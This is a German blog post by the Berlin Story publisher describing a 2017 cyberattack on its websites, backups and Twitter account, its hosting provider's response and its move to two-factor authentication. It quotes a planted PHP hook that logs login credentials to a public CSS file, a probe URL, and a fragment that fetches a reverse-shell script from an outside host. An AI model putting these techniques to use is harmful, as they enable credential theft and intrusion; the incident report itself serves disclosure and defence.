Berlin Story gehackt

Türkisches Skript. Zentrale Daten gelöscht. Der Angriff dauert an

Auf die Website des Berlin Story Verlages und des Berlin Story Bunkers ist ein massiver, professioneller und zum Teil weiter andauernder Angriff verübt worden. Er erfolgte nach der Unterstützung der Aktion „Free Deniz“ zugunsten des in türkischer Haft sitzenden Journalisten Deniz Yücel. Daher liegt es nahe, dass der Cyberangriff von türkischer Seite aus begangen wurde.

Bei der Attacke wurden sämtliche Daten des Verlags gelöscht, darunter etwa 200 fertig gesetzte Bücher, Verträge und die entsprechende Kommunikation. Außerdem wurde die gigantische Datenmenge der Dokumentation „Hitler – wie konnte es geschehen“ zerstört. Das ist besonders gravierend, denn die Ausstellung soll im Mai 2017 auf drei
Etagen des 6.500 Quadratmeter großen Berlin Story Bunkers eröffnet werden. Darüber hinaus ist die gesamte extrem umfangreiche Website betroffen, die täglich in einem Blog über das gesellschaftliche Geschehen rund um Verlag und Bunker berichtet.

Alle Daten sind anspruchsvoll geschützt, weit über das Normalmaß hinaus. Sämtliche Passworte stammen von Passwortmanagern, sind also „exzellent“, nicht einfache Namen-Zahlen-Kombinationen. Die meisten Daten konnten inzwischen rekonstruiert werden. Sie werden allerdings sofort wieder massiv attackiert.

Dieser lange Beitrag beschäftigt sich mit den politischen und ausführlich auch den technischen Aspekten des Angriffs – und wie man versuchen kann, sich vor ähnlichen Attacken zu schützen. Die technischen Aspekte greifen wieder in die Politik, weil es um die Frage geht: Schützt ein deutsches Unternehmen wie 1&1 die Daten wie versprochen? Oder ist doch Google die bessere Lösung?

Der politische Hintergrund

Rechte und nationalistische Populisten haben derzeit in zahlreichen Ländern der Welt Oberwasser. Sie wollen ihr jeweiliges Land groß machen und versprechen Vorteile für ihre Gefolgschaft auf Kosten aller anderen. Diese Entwicklung  beobachten wir mit Sorge. Im Verlag und noch mehr im Bunker geht es genau darum, dass wir den Nationalismus auch in aktualisierter Form nicht wieder haben wollen. Daher engagieren wir uns auf vielen Ebenen gegen Diktaturen und Populisten – egal ob im eigenen Land oder anderswo auf der Welt. Das ist für uns nicht abstrakt, nicht akademisch und nicht museal, sondern gesellschaftspolitisch notwendig.

Dabei unterstützen wir auch die Bürgerrechtsgruppe Pixelhelper, die mit Projektionen auf Botschaftsgebäude auf politische Missstände aufmerksam macht. Die Hilfe besteht in Unterstützung ihrer Pressearbeit. Pixelhelper hat auf die Berliner Botschaft des Königreiches Saudi Arabien #FreeRaif projiziert, um auf den inhaftierten und gefolterten Blogger Raif Badawi aufmerksam zu machen. Mehrmals wurde auf die türkische Botschaft die Forderung projiziert, Deniz Yücel frei zulassen. Bilder dieser Projektionen verbreiten sich rasend schnell in den sozialen Medien und zeigen den Aktivisten, dass andere sich auch engagieren.

Offenbar war die Unterstützung von Pixelhelper durch Enno Lenze, Verleger und Betreiber des BerlinStory Bunkers, der Ausgangspunkt des Angriffs. Zur bürgerlichen Freiheit und zur parlamentarischen Demokratie hat Enno Lenze mit anderen ein Jahrzehnt lang das große Geschichtsfestival Historiale organisiert, besonders zu 1848, als die Bürger Europas für mehr Rechte und für Pressefreiheit kämpften. Das Thema ist also nicht neu und wird jetzt nur anders behandelt.

Enno Lenze: „Man kann die Weltlage ignorieren, sich als ,unpolitisch’ verstehen oder sich darauf berufen, dass man unabhängig sein will und sich nicht äußert. Aber davon wird es nicht besser. Daher engagieren wir uns seit langem für demokratische Werte und für unterdrückte Menschen. Ich bin bei Reporter ohne Grenzen, seit den 1990ern im Chaos Computer Club und habe viel Hilfe für Flüchtlinge an der IS-Front geleistet. Das Ironische daran: Wenn der IS auf mich schießt, kann ich inzwischen damit umgehen. Wenn es Morddrohungen gibt, kümmert sich die deutsche Polizei sofort darum – wiederholt und zuverlässig. Wenn aber unsere Internetseiten gekapert oder gelöscht sind, wenn mein Twitter-Account gehackt wird, weiß ich nicht, was ich tun soll, an wen ich mich wenden kann.

Chronologie der Ereignisse

Auftakt

Es begann damit, dass vergangenen Sonntag, dem 9. April 2017, die Seite Pixelhelper.org durch eine DDOS-Attacke lahmgelegt wurde. Dabei wird der Server mit so vielen Anfragen geflutet, dass er nicht mehr reagieren kann.

Angriff auf die private Homepage Enno Lenze

Am Montag, dem 10. April 2017, wurde die (private) Seite EnnoLenze.de gehackt. Im ersten Moment scheint das unspektakulär. Dort liegen keine geheimen Daten, sondern im aktuellen Teil seine ausführlichen Berichte
über zahlreiche Besuche der Peshmerga in Kurdistan/Irak, die Fahrten an die Front und in die Flüchtlingslager.

Das Risiko, dass eine Website gehackt werden kann, ist bekannt. Dennoch war die Frage, wie der Einstieg möglich war. Das verwendete Content Management System (kurz CMS) war auf dem aktuellen Stand, das Passwort hatte mehr als zwanzig Zeichen und bestand aus zufällig gewählten (Sonder-)Zeichen.

Nach Umzug der Domain sofort nächster Angriff

Um zu verhindern, dass andere unserer Webseiten auf dem Server angegriffen werden, zog die Domain samt Inhalt sofort zu einem anderen Anbieter. Das CMS wurde neu installiert, die Datenbank eingespielt und alle Passwörter getauscht. Völlig überraschend war diese neue Website bei dem anderen Provider binnen weniger Stunden wieder gehackt.

Wir haben sofort alle Passwörter für Social Media Accounts, Emailadressen, Websites usw. für Enno Lenze privat sowie die Berlin Story erneut geändert. Sonst machen wir das monatlich.

Geheimdienst aktiv?

Aktuell gibt es Versuche, an die Social Media Accounts zu kommen. Gleichzeitig wird parallel versucht, an die Emailadressen zu kommen, die bereits beim neuen Anbieter liegen. Dies bekommen wir mit, da uns die Nachrichten über fehlgeschlagene Login-Versuche erreichen. Es ist also kein Angriff, der zufällig oder automatisiert durchgeführt wird, sondern gezielt und andauernd. Dazu braucht man Experten, die solche Attacken permanent betreiben. Man muss
das Ziel beobachten und mitbekommen, zu welchen alternativen Anbietern die Webseiten umziehen. Dann muss man in der Lage sein, auf die neue Situation unmittelbar zu reagieren.

Solche Angriffe haben eine andere Dimension als die zufälligen Versuche, die wir gewöhnlich als Grundrauschen in der IT-Sicherheit beobachten können. Die Vermutung liegt nahe, dass man uns und andere gezielt einschüchtern und behindern will, die sich gegen den Aufbau neuer Regime engagieren.

Uns überrascht aber, mit welchem Aufwand hier selbst gegen einen relativ kleinen Player wie uns vorgegangen wird. Wir berichten darüber, weil Viele es nicht tun. Wir kenne andere Opfer kleinerer Angriffe, die sich nun nicht mehr äußern wollen, um weitere Angriffe zu vermeiden. Die Dunkelziffer dürfte aber sehr hoch sein – der finanzielle Aufwand der Angreifer aber auch.

Türkische Skripte

Bei der Suche nach Dateien, die ganz aktuell erstellt wurden, taucht eine mit diesem Inhalt auf. Der Text ist türkisch. Es ist die Ausgabe von einem Programm, welches Passwörter rät oder aus anderen Quellen extrahiert. Enno Lenze: „Ich bin vertraut mit solchen Programmen und erkenne sie sofort. Ungewöhnlich allerdings ist die Ausgabe in türkischer Sprache – normalerweise werden englischsprachige Programme verwendet.“ Neben wahllosem Raten sind aber auch der richtige Benutzername und das korrekte, hier jedoch nicht veröffentlichte Passwort für das Blog eingefügt.

function logla($kul,$pas){
$dosya=fopen(„XXXXX.css“,“a+“);
fwrite($dosya, „kullanici : „.$kul.“ sifre : „.$pas.“\n“);
fclose($dosya);
}

(…)

kullanici : gesamten sifre : gesamten

kullanici : sifre :

kullanici : sifre :

kullanici : admin sifre : winston1

kullanici : sifre :

kullanici : enno sifre : 123

kullanici : enno sifre : XXXXXXXXXXX

kullanici : sifre :

kullanici : sifre : k

kullanici : enno sifre : 123

(…)

Das war der Angriff auf die private Internetseite von Enno Lenze.

Angriff auf die Homepage Berlin Story und die Back ups

In der Nacht zu Dienstag, dem 11. April wurden dann alle Seiten der Berlin Story gelöscht. Sie bestehen aus Dateien auf dem Server sowie Datenbanken. Dort liegen zum Beispiel Texte und die Anordnung der Menüs der Homepage, während in den Ordnern des Servers Bilder, Audiodateien und Filme liegen – der gesamte Datenbestand des Verlags und der Dokumentation.

Im Anschluss wurden unsere Backups auf demselben Server gelöscht. Alle Daten anderer Kunden auf diesem kommerziellen Server und deren Backups sind weiterhin vorhanden.

Webhoster nicht hilfreich

Wir informierten unseren Dienstleister 1&1 und fragten, was passiert sei. Während 1&1 für die Sicherheit des Servers an sich zuständig ist (etwa vergleichbar dem Vermieter eines Hauses, der sich um die Haustür kümmern muss), sind wir für die Sicherheit unseres CMS zuständig (vergleichbar der eigenen Wohnungstür).

Es ist unwahrscheinlich, dass das Sicherheitsproblem bei 1&1 liegt. Dann hätte es alle Webseiten auf deren Server betroffen. Da das verwendete CMS aktuell war und ein langes und sicheres Passwort verwendet wurde, konnte ein simples Raten des Passwortes nicht vorliegen.

Eine schwierige Ausgangslage. Dennoch kann das auf Datenspeicherung und Datensicherung spezialisierte Unternehmen besser auf weitere Daten zur Analyse des Problems zugreifen. Zunächst wurde mitgeteilt, der Vorgang sei in Prüfung.

Am 12. April 2017 gab es dann einen sehr knappen Bericht:  „Mit dieser Nachricht erhalten Sie das Ergebnis unserer Webspace-Analyse. Wir haben Ihren Webspace überprüft und haben dabei keine weiteren schädlichen Dateien mehr erkennen können. Zu Ihrer Frage, welches als Einfallstor diente geben die Access-Logs in Ihrem Webspace weitere Ansätze: POST /index.phpoption=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b HTTP/1.1

So entsteht der Verdacht, dass die index.php (welche von Ihnen bereits ersetzt wurde) als Einfallstor gedient haben kann.“

Im Kern sagt die Zeile aus dem Access-Log (also der Datei in der alle Anfragen an den Webserver dokumentiert werden), dass jemand den zitierten Link aufgerufen hat. Das Ergebnis ist jedoch schlichtweg, dass man die Startseite unserer Homepage angezeigt bekommt und nichts weiter passiert. Mit dem Aufruf dieses Links kann man bei einem anderen Content Management System prüfen, ob eine bestimmte Sicherheitslücke vorhanden sein könnte, weil es sich möglicherweise um eine ältere Version handelt oder weil man als Geheimdienst in der aktuellen Version das Einfallstor schon kennt, die Öffentlichkeit aber noch nicht. Ein Beispiel: Wenn man das Content Management System Joomla installiert hat und jemand ruft diesen Link auf:

Berlinstory.de/index.phpoption=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20&6bc427c8a7981f4fe1f5ac65c1246b5f=cf6dd3cf1923c950586d0dd595c8e20b

… dann sieht er, ob dieses Joomla eine Sicherheitslücke hat. Der Angreifer hat also geprüft, ob wir ein verwundbares Joomla haben. Haben wir nicht – wir haben gar kein Joomla. Passiert ist dadurch gar nichts.
Aber 1&1 sagt „Vermutlich sind sie so rein gekommen.“

Mit der mageren Auskunft von 1&1 fühlten wir uns alleingelassen.Man bekommt nach einem Tag „Analyse“ eine offensichtlich wenig hilfreiche Mail von dem Dienstleister, den man seit Jahren für sicheres Webhosting bezahlt. Durch die knappe Antwort ist für uns weiterhin unklar, ob die Sicherheitslücke in unserem Bereich lag oder bei 1&1. Die Antwort auf genau diese Frage wäre die Grundlage, um das weitere Vorgehen abzustimmen.

Suche nach dem Einfallstor

Jetzt ging die Suche nach dem Leck an anderer Stelle weiter: Hat der Angreifer Zugang zu einer Administrator-Emailadresse erhalten und konnte sich so ein neues Passwort zusenden lassen? Oder lag es am Passwort-Manager? Hunderte zufällige Passwörter kann man sich ohne diese Software nicht mehr merken. Weil wir keine Hilfe von 1&1 erhielten, zum Glück aber die Szene guter IT-Sicherheitsleute kennen, machten wir uns selbst auf die Suche. Wir zogen einen Experte aus Kanada hinzu, der ebenfalls alles analysierte und Vorschläge zur Verbesserung der Sicherheit machte.

Intermezzo: Twitter Seite gekapert

Noch während dieser Analyse wurde der Twitter-Account @EnnoLenze gehackt. Die Angreifer ersetzten das Titelbild durch eine türkische Flagge und teilten Tweets vom offiziellen Account von Reccep Erdogan .Um an den Twitter Account zu kommen, wurde die Funktion „Passwort-Vergessen“ genutzt, anschließend die hinterlegte Email-Adresse geändert und das Twitter- Profil auf türkisch gestellt. Wie genau der Ablauf war, ließ sich nicht klären.

Während man bei einem Einbruch oder einem Diebstahl im echten Leben die Polizei rufen kann, war die Lage hier schwieriger: Wen fragt man um Hilfe? Und wem „gehört“ eigentlich ein Twitter-Account? Das Unternehmen
Twitter gab den Account nach einem Tag wieder zurück, da man dort Erfahrung mit solchen Problemen hat. Dieser Angriff war relativ harmlos und technisch weniger schwierig.

Zurück zur Internetseite

Was genau war mit unseren Servern passiert? Dies zu wissen, ist die Grundlage, um ähnliche Attacken in Zukunft zu unterbinden. Die Webseiten und ein großer Teil der Daten wurden aus noch vorhandenen Backups wieder hergestellt. Um einen neuen Angriff zu vermeiden, wurde sie jedoch als „nur lesbar“ online gestellt. Ein Angreifer hätte also keine Änderungen vornehmen können – wir selber aber auch nicht. Keine zufriedenstellende Lösung, aber so war die Seite wenigstens wieder online.

Bei uns herrscht weiter das schlechte Gefühl vor, dass Email-Adressen, Kundenkonten oder der Passwortmanager kompromittiert worden sein könnten. Bis jetzt können wir diese Frage nicht beantworten, sondern nur vermuten, dass dem nicht so war. Denn in diesem Fall hätte der Angriff auch andere Social Media Accounts von uns betroffen.

Wer kann uns schützen?

Vor einigen Jahren standen wir vor der Entscheidung, wem wir vertrauen können und wer uns am besten schützt. Die Daten der Berlin Story, im Laufe von zwanzig Jahre eher wild gewachsen, sollten zusammengelegt werden. Seinerzeit diskutierte man um das „deutsche Internet“. Man hatte seine Daten nicht so gerne in den USA. Die Idee war also, alle Daten bei deutschen Anbietern zu lagern, um eben nicht von „den Amis“ abhängig zu sein. Bei amerikanischen Anbietern schwingt immer die Sorge mit, US-Behörden könnten uneingeschränkten Zugriff haben. Damals haben wir uns für 1&1 entschieden.

Was tun?

Am Mittwoch, dem 12. April war also klar, dass es sich um ein weitreichendes und andauerndes Problem handelt und wir eine gute und zukunftsfähige Lösung brauchen. Der Plan war also Domains, Webhosting, Datenbanken sowie die Emailadressen zu anderen Anbietern umzuziehen und den bisherigen Passwortmanager zu ersetzen. Das ist ein ziemlicher Aufwand, da daran alle Kalender, Adressbücher und viel mehr hängen, die gesamte Infrastruktur eines verzweigten Unternehmens. Und es stellt sich die Frage ist: Wo geht man hin?

Schützen wie beim Online Banking – wer kann das?

Die Auswahl wurde schnelle kleiner, da nun alle Anbieter für jeden einzelnen Dienst eine Zwei-Faktor-Autorisierung (kurz „2FA“) haben sollten. Das heißt, dass man nicht nur einen Benutzernamen und ein Passwort hat, sondern zusätzlich eine SMS bekommt oder mit einem zusätzlichen Gerät eine TAN angezeigt bekommt, die man eingeben muss. Das Verfahren ist bekannt vom Onlinebanking.

Der Umzug hat mehrere Stufen: Den Passwortmanager einrichten und 2FA aktivieren, Passwort ändern, sich beim Domain-Hoster anmelden, 2FA aktivieren, Passwort ändern und die komplette Domain zum neuen Dienstleister ziehen. Dann beim Webhoster anmelden, 2FA aktivieren, Passwort ändern und ein brauchbares Paket buchen. Einen sicheren Übertragungsweg für die Daten nutzen (wie z.b. ssh), die Schlüsseldateien dafür austauschen, Daten kopieren und die Datenbanken einrichten. Email-Adresse einrichten, 2FA aktivieren, Passwort ändern, auf einem sicheren Weg alle bestehenden Emails kopieren. Alleine das Kopieren der Emails dauert einen ganzen Tag pro Konto, da sich in den
vergangenen zwanzig Jahren mehr als hunderttausend Mails gesammelt haben.

Kaum ein deutscher Anbieter bietet jedoch solchen Schutz auf dem neuesten Stand der Technik. „Wird nicht nachgefragt. Zu wenige Kunden für so was“, lautete die Erklärung. Die Emails liegen nun bei Google,
weil der Schutz der Privatsphäre hier besonders gut ist. Man weiß nicht, ob man lachen oder weinen soll: Der Konzern, vor dem die ganze Welt warnt, der uns angeblich digital ausbeutet und nur unsere Daten will,
ist ausgerechnet der, an den wir uns nun wenden, um sicher zu sein.

1&1 – nochmal Anmeldung verpennt

Ostersamstag mittags, am 15. April 2017, erreicht uns ein Anruf von 1&1. Es gehe um die Sicherheit, sie hätten den Eindruck, unsere Daten seien missbraucht worden. Die Freude bei uns darüber, dass man sich am Wochenende drum kümmerte, war zunächst groß. Jedoch ging es nicht um das schwerwiegende Problem. Es ging um ein Blog, das wir gestern zur Sicherheit mit einem neuen Kundenkonto buchen wollten. Und eben diese Buchung wurde „aus Sicherheitsgründen“ storniert. Leider konnte man uns nicht sagen, welche Sicherheitsgründe das sein sollen. Wir sollen die Bestellung einfach nochmal ausfüllen, dann würde es aber klappen. Diese Auskunft ist wohl der Sargnagel für unsere Geschäftsbeziehung.

Was kostet das alles?

Ein bis jetzt gar nicht angesprochenes Thema ist das Geld. Wir selbst haben bisher mehr als Manntage einer hochqualifizierten, hausinternen IT-Sicherheitskraft aufgewendet. Hätten wir diese Erfahrung nicht, wäre
es richtig teuer geworden.

Der externe Berater wird nach Stunden bezahlt. Ein Teil der Homepage-Kosten und der gesamten IT-Struktur wird nun mehrere Monate doppelt anfallen, weil man bei 1&1 und anderen Anbietern stets mit Kündigungsfristen leben muss. Am Ende wird uns dieser Einbruch vermutlich mehr als 20.000 Euro kosten – und eine Menge Nerven.

Das ist der Punkt an dem man sich fragt: Wollen wir uns weiter engagieren, oder wird solcher Einsatz langsam zu teuer? Genau das bezwecken solche Angriffe. Für uns steht außer Frage, dass wir weitermachen. Aber es kann nicht sein, dass politisches Engagement vom Geldbeutel und von der psychischen Leidensfähigkeit anhängt.

David gegen Goliath

Was unter Erdogan in der Türkei entsteht, wird vorsichtig als „autoritärer Staat“ umschreiben, ist aber unserer Ansicht nach eine Diktatur. Die Unregelmäßigkeiten beim Referendum zugunsten des Präsidialsystems sprechen dafür. Jegliche Opposition und jegliche freie Meinungsäußerung werden ausgeschaltet. Die Gefängnisse sind überfüllt. Die Gleichschaltung der Medien und der Bevölkerung zu einer Volksgemeinschaft schreiten voran. Das geht uns an. Im Berlin Story Museum (mit AudioGuide in türkischer Sprache) lernen wir immer wieder Türken kennen, die sich in Berlin niederlassen wollen, die eine Wohnung kaufen oder einen Job suchen. Wir berichteten darüber im Blog.

Die Konsequenzen für uns: Noch mehr Sicherheit beim Schutz der Daten einbauen.

Dieser Bericht wird erst jetzt veröffentlicht, nachdem unsere Websites so stabilisiert sind, dass ein erneuter Angriff nur sehr schwer möglich ist .

Update: Technische Details

Ein IT-Sicherheitsmensch eines großen IT Unternehmens hat sich bei uns gemeldet und die verfügbaren Daten angesehen. Dabei hat er einen Teil des Hacks rekonstruieren können:

Der Angreifer hat erst geguckt, welche Domains auf uns registriert sind. Dann hat er geprüft, welche auf dem gleichen Server liegen. Diese hat er nach Sicherheitslücken durchsucht. Eine der anderen Installationen hatte ein veraltetes Plugin, zu dem eine Lücke bekannt war. Die Lücke wurde mit DirBuster[1] gefunden. Anschließen wurde über die Lücke von http://93.190.137.xxx/rev.py.txt%20-O%20/tmp/b Schadsoftware nachgeladen und mit dieser ein Reverse-Tunnel auf 93.190.137.xxx:2121 aufgebaut. Dies machte der Angreifer über die IP-Adresse 81.171.85.xxx, welche ipvanish.com gehört, einem Anonymisierungsdienst. Weitere Kontakte kamen über einen Server mit der IP-Adresse 217.23.3.xxx, welcher vermutlich vorher schon übernommen wurde und nur als Proxy gedient hat. Anschließend wurde die wp-config.php von berlinstory.de so geändert, dass sie die eingegebenen ugangsdaten in eine öffentlich einsehbare CSS Datei schreibt.

function logla($kul,$pas)

$dosya=fopen(„XXX.css“,“a+“);

fwrite($dosya, „kullanici : „.$kul.“ sifre : „.$pas.“n“);

fclose($dosya);

Durch den Zugang zum Dateisystem kamen sie auch an die Konfigurationsdateien für die Backups und an die .bash_history – eine Datei in der die zuletzt benutzen Befehle liegen. Jeder Admin wird gerade die Peitsche raus holen und mich jagen wollen, weil dort der Hostname und Benutzername des Backupservers drin lagen – aber shit happens. So ging es also weiter zum Backupserver (online, klar) der dann auch weg war. Es bestehen aber offline Backups, die je nach Projekt ein bis vier Wochen alt sind und die man teilweise zusammensuchen und vergleichen muss.